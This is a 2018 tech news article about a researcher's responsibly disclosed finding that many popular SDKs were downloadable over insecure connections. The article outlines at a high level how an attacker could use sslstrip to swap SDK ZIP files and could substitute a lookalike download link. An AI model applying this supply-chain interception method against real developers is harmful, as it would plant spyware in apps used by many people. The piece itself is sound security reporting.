CYBER MONDAY WEEK 🤑 Get 30% off your TNW for Startups or Scaleups packages when you use code CYBER30 only until December 4 →

This article was published on February 15, 2018

Want to hack a million iPhones? Target SDKs, finds security researcher


Want to hack a million iPhones? Target SDKs, finds security researcher

John Donne once said, “no man is an island.” If he lived in the 21st century, he might have said the same thing about software. Programs which, on the face of it, appear to be completely distinct entities, actually consist of dozens of other components made by other developers and companies.

There are millions of third-party libraries and software development kits (SDKs) on the Internet. Developers download them and integrate them into their software, thereby saving them time when building features and functionality. There’s no need to reinvent the wheel for each thing they want to do.

But are they also a security Achilles heel? Bay Area security expert Felix Krause examined several of the most popular SDKs, and found many lacked transport-level security. Or, to put in plainer terms, they were being served in an insecure fashion, allowing a malicious third-party to intercept and modify the contents.

Your app is grass

Before we go any further, I want to say that Krause’s research is platform-agnostic. It affects software of all stripes. Windows. Linux. MacOS. Android. iOS. Amiga too, probably.

That said, in this section, I’m going to talk about iOS apps because it’s familiar to most people, and because it’s a particularly interesting case study. It also happens to be Krause’s major area of interest, and the platform upon which he’s based much of his research.

Let’s suppose you want to infect a million iPhone users with malware. I don’t know why, but you do. It’s a tricky proposition. For starters, Apple’s locked down iOS tighter than Fort Knox. Grabbing an iOS zero day is a non-starter, too; those start in the six-to-seven figure range.

So, as a last resort, you sneak a developer a compromised SDK, who then inserts the dodgy code into their app (we’ll talk about how this works later). You then get the keys to the kingdom, more or less. Although Apple’s killjoy sandboxing stops the real fun, the malicious code can still access:

  • Any files and folders the app has access to
  • Any permissions the app has access to (hello, microphone and location services!)
  • The iCloud container belonging to the app
  • All Keychain data the app has access to
  • All information exchanged between the application and a remote server.

Yikes. In short, you could turn an ostensibly-legitimate application into an Orwellian spying machine that records every tap — every keypress — made within it. It could even record where the user has been. And it could harvest credentials, which could be sold to other bad actors.

And it’s all done at an unimaginable scale. An individual SDK might harvest hundreds of apps, which in turn ensnare thousands of users apiece.

How this works

Man-in-the-middle attacks are nothing new. This research isn’t about them, but rather about how important pieces of software are transported, and how that affects the broader software security ecosystem. It’s important to touch on how this attack works, however.

This attack requires a third-party to position themselves either between a developer’s computer and the rest of the network, or between the network and the server providing SDK downloads. This allows them to observe and modify traffic as it goes from the computer, to the outside world. The finer technical details can be read on Krause’s blog, if you’re curious.

The victim could be anywhere: at a hotel, a cafe, or an airport. It doesn’t matter. Once the attacker is positioned, they can start serving bogus SDKs. Krause pointed out that it’s trivial to replace text in an HTML document. So, they could change the link location on a download page to one that points elsewhere.

An example given by Krause explores changing the location of Localytics’ SDK to one that’s visually similar, and unlikely to arouse suspicion. See if you can spot the difference:

  • https://s3.amazonaws.com/localytics-sdk/sdk.zip
  • https://s3.amazonaws.com/localytics-sdk-binaries/sdk.zip

The former is the legitimate SDK, while the one containing “localytics-sdk-binaries” serves the malicious code.

Krause has also created a proof-of-concept that allows him to switch the contents of ZIP files and binaries in real-time. This works by downgrading traffic from an encrypted format, to one that has no such protections, through a tool called sslstrip. Step-by-step, here’s how this works:

  • A developer downloads an SDK
  • T then modify it, inserting their own malicious code
  • The attacker compresses the code.
  • The attacker watches over the network traffic and waits for the developer to download an SDK.
  • They then replace any ZIP file matching a certain pattern with their own payload.

Vendors are serving insecure SDKs

The avenue of attack highlighted by Krause’s research is a threat because of one thing: vendors are serving SDKs in a wholly-insecure fashion.

Krause looked at 41 of the most popular SDKs. Thirteen of these were potentially vulnerable to a man-in-the-middle attack, while five offered no way to securely download the SDK at all. Many of these belong to big-name tech companies.

Take Amazon (which, to its credit, fixed the problem within three working days), for example. The Seattle-based tech titan served its AWS (Amazon Web Services) SDK downloads over ultra-insecure HTTP.

Another major SDK provider, Localytics (which has also resolved the problem), had an unencrypted documentation sub-site, which linked to its SDK. An attacker could have intercepted this and replaced the link to a malicious substitute, as mentioned earlier.

In line with ethical disclosure procedures, Krause gave the affected SDK developers a meaningful opportunity to resolve the issue before disclosure. This meant he contacted the relevant stakeholders within each organization, and gave them three months to resolve the issue to his satisfaction.

The issue is remarkably trivial to fix. Unlike many vulnerabilities, which require weeks worth of legwork, vendors only need to ensure their SDKs are downloaded through encrypted channels.

Depressingly, however, vendors have failed to take any meaningful action. Five days before the publication of this article, Krause wrote to me and told me that nearly two-thirds of the affected SDK providers had failed to protect their SDK downloads. He said:

I just went through the list and checked if the SDK providers fixed their sites:

I notified all affected in November and December 2017, giving them enough time to resolve the issue before publicly blogging about it. Out of the 13 affected SDKs, 1 resolved the issue within three business days, 4 resolved the issue within a month, and 8 SDKs are still vulnerable to this attack at the time of publishing this post. The SDK providers that are still affected haven’t responded to my emails, or just replied with “We’re gonna look into this” – all of them in the top 50 most most-used SDKs.

Which is shocking….

The software food chain

When you think about it, software isn’t too dissimilar from a piece of steak you might buy in a supermarket. You purchase it with the assumption that it’s safe to eat. For that to work, it needs to have been handled appropriately during each stage of the manufacturing process. From farm to fork, everyone needs to do their job properly.

Software is a bit like that. The end-user purchases a piece of software from their supermarket (in this scenario, the App Store) with the assumption that it won’t harm them. But for that assumption to be true, everyone needs to adhere to security best-practices: not just developers.

Get the TNW newsletter

Get the most important tech news in your inbox each week.

Published
Back to top